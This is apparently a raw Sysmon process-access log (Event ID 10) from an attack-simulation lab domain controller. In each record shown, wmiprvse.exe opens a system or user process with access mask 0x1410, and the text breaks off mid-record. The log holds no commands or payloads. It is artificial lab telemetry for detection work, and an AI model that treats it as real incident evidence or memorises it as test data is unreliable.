15:59:39.522{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4984-6008-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026766Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:39.334{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-536A-6008-6D06-00000000A301}6920C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026765Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:39.334{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-536A-6008-6C06-00000000A301}4300C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026764Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:39.334{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-536A-6008-6B06-00000000A301}5244C:\Windows\System32\rundll32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026763Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:39.334{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5359-6008-4306-00000000A301}4856C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026762Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:39.334{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5357-6008-3E06-00000000A301}6760C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026761Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:39.334{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5356-6008-3906-00000000A301}4832C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026760Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:39.334{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5354-6008-3406-00000000A301}6596C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026759Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:39.334{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5353-6008-2F06-00000000A301}3716C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026758Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:39.334{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4FA9-6008-4405-00000000A301}7000C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026757Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:39.334{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4FA9-6008-4305-00000000A301}7420C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026756Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:39.334{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4DC0-6008-FB02-00000000A301}8056C:\Program Files\Internet Explorer\iexplore.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026755Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:39.334{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A9B-6008-1501-00000000A301}6076C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026754Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:39.334{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A99-6008-1401-00000000A301}5960C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026753Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:39.334{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8C-6008-0601-00000000A301}2500C:\Windows\Explorer.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026752Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:39.334{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8A-6008-FF00-00000000A301}4808C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026751Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:39.334{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8A-6008-FC00-00000000A301}5008C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026750Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:39.334{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A88-6008-F600-00000000A301}1548C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026749Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:39.334{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A88-6008-F300-00000000A301}4180C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026748Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:39.319{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A27-6008-E400-00000000A301}2860C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026747Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:39.319{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A22-6008-DB00-00000000A301}4244C:\Program 